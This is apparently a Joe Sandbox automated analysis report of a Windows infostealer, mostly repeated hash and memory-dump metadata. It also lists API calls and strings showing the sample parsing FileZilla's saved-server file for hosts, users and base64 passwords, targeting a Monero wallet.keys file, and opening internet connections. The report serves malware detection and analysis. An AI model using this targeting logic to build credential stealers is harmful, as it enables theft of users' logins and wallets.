                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 10d4cf56bea0797d4aec6a1af681cbf56fa9c5cfffc50105e8fe7791180b9b9b
                                    • Instruction ID: a3f787373e316090c6f98fe6b9df12e8bd387554914fede94287079e784b3fca
                                    • Opcode Fuzzy Hash: 10d4cf56bea0797d4aec6a1af681cbf56fa9c5cfffc50105e8fe7791180b9b9b
                                    • Instruction Fuzzy Hash: 115148B390C600DBD304AA2DDD5667EBBE5BB58250F1A453DDBCA53B84EA31181187C7
                                    Function 010E1F91 Relevance: .2, Instructions: 174COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cd14e7ef3471dc4c611529113a6ff1e53a282c3ee8c4df59ed467dc7fc0ded89
                                    • Instruction ID: 57335410b2cf189bb99d21100707eba509ddd9034c8fd038c23dd263980d5fc8
                                    • Opcode Fuzzy Hash: cd14e7ef3471dc4c611529113a6ff1e53a282c3ee8c4df59ed467dc7fc0ded89
                                    • Instruction Fuzzy Hash: 2D5154F650C304EFD3146E2ADC4963EFBE9FBA4610F06492EE7C256740EA319A50C687
                                    Function 00F2BAB2 Relevance: .2, Instructions: 164COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 17b5adf1cf19df39082a862a5847fef9a8ef642db6d9657f468fb688f7d16335
                                    • Instruction ID: c22fc12bdc8309b0607801aad9506361f02204326ad90db1cb7ee07ead22113b
                                    • Opcode Fuzzy Hash: 17b5adf1cf19df39082a862a5847fef9a8ef642db6d9657f468fb688f7d16335
                                    • Instruction Fuzzy Hash: FC51E4F391C6109FE304AE29DC8537AF7E5EBD4760F1A893DE5D4C7284E63448458B86
                                    Function 00F20A1C Relevance: .2, Instructions: 153COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 897a37372dca8584ee51da608e20a621613b3eb923240a5f6fedd954b8ddc366
                                    • Instruction ID: f0cffa5f384e57ed3c2c2f2731e21a770761a75377e359031c690c4b91dfa07b
                                    • Opcode Fuzzy Hash: 897a37372dca8584ee51da608e20a621613b3eb923240a5f6fedd954b8ddc366
                                    • Instruction Fuzzy Hash: 3E4124F3E182144BF7045D39EC9436AB6D6DBC4320F1E8A3DDE88D7789E9395D058286
                                    Function 00C46799 Relevance: .1, Instructions: 131COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction ID: 87ea24f2df3c2c911bf17b1d3ec57fe410225b96b0be01817ed263e765141820
                                    • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction Fuzzy Hash: 59514C62E09BD985C7058B7544502EEBFB22FE6214F1E829EC4981F383C3759689D3E6
                                    Function 00F6EE4B Relevance: .1, Instructions: 121COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e2298d82167e9696b4cca379abe3d4833d41840512288587dd02d8d1113a7ccb
                                    • Instruction ID: f334f984b313f7afbf8960865ceff805515da7e11c752afd0d8f355cbddd39b7
                                    • Opcode Fuzzy Hash: e2298d82167e9696b4cca379abe3d4833d41840512288587dd02d8d1113a7ccb
                                    • Instruction Fuzzy Hash: 0B3168F3F186145BF3088629EC41726B6D6DBD4720F2AC63EEA49CB380F9788C018191
                                    Function 0109A340 Relevance: .1, Instructions: 86COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1ab0795aea30c523bac044b2ef650ce03f6c9bd09d3d6b87d48697f7c120075c
                                    • Instruction ID: 273f811dfd5fe060883a2a315c051efcf194b3eb18471f1528e4b1d81199db1c
                                    • Opcode Fuzzy Hash: 1ab0795aea30c523bac044b2ef650ce03f6c9bd09d3d6b87d48697f7c120075c
                                    • Instruction Fuzzy Hash: 4A3105B210C7049FE345BF28D882ABEFBE5EF98311F06492DE6D582650DA31A4448B97
                                    Function 00C17588 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                    • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                    • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                    • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                    Function 00BE9AA0 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    Function 00BE03B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BE8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BE8F9B
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BDA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BDA13C
                                      • Part of subcall function 00BDA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BDA161
                                      • Part of subcall function 00BDA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BDA181
                                      • Part of subcall function 00BDA110: ReadFile.KERNEL32(000000FF,?,00000000,00BD148F,00000000), ref: 00BDA1AA
                                      • Part of subcall function 00BDA110: LocalFree.KERNEL32(00BD148F), ref: 00BDA1E0
                                      • Part of subcall function 00BDA110: CloseHandle.KERNEL32(000000FF), ref: 00BDA1EA
                                      • Part of subcall function 00BE8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BE8FE2
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00BF0DBF,00BF0DBE,00BF0DBB,00BF0DBA), ref: 00BE04C2
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE04C9
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00BE04E5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE04F3
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 00BE052F
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE053D
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00BE0579
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE0587
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00BE05C3
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE05D5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE0662
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE067A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE0692
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE06AA
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00BE06C2
                                    • lstrcat.KERNEL32(?,profile: null), ref: 00BE06D1
                                    • lstrcat.KERNEL32(?,url: ), ref: 00BE06E0
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE06F3
                                    • lstrcat.KERNEL32(?,00BF1770), ref: 00BE0702
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE0715
                                    • lstrcat.KERNEL32(?,00BF1774), ref: 00BE0724
                                    • lstrcat.KERNEL32(?,login: ), ref: 00BE0733
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE0746
                                    • lstrcat.KERNEL32(?,00BF1780), ref: 00BE0755
                                    • lstrcat.KERNEL32(?,password: ), ref: 00BE0764
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE0777
                                    • lstrcat.KERNEL32(?,00BF1790), ref: 00BE0786
                                    • lstrcat.KERNEL32(?,00BF1794), ref: 00BE0795
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE07EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: 1f92babc46ea2cc2df151f730db13f61feb7d3575e5ef7de5d5ed1fee7257ec2
                                    • Instruction ID: 5f0b5ad9326aa7d58d4aa8fdfd8349b46babe60b3a0075f739c980fee2da695d
                                    • Opcode Fuzzy Hash: 1f92babc46ea2cc2df151f730db13f61feb7d3575e5ef7de5d5ed1fee7257ec2
                                    • Instruction Fuzzy Hash: 91D10B72910148ABCB04EBF5DD96EEE77BDAF19300F408594F106B70A1EB74BA49CB61
                                    Function 00BD59B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BD4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BD4889
                                      • Part of subcall function 00BD4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BD4899
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BD5A48
                                    • StrCmpCA.SHLWAPI(?,018BE6D8), ref: 00BD5A63
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BD5BE3
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,018BE758,00000000,?,018BA6B8,00000000,?,00BF1B4C), ref: 00BD5EC1
                                    • lstrlen.KERNEL32(00000000), ref: 00BD5ED2
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BD5EE3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD5EEA
                                    • lstrlen.KERNEL32(00000000), ref: 00BD5EFF
                                    • lstrlen.KERNEL32(00000000), ref: 00BD5F28
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BD5F41
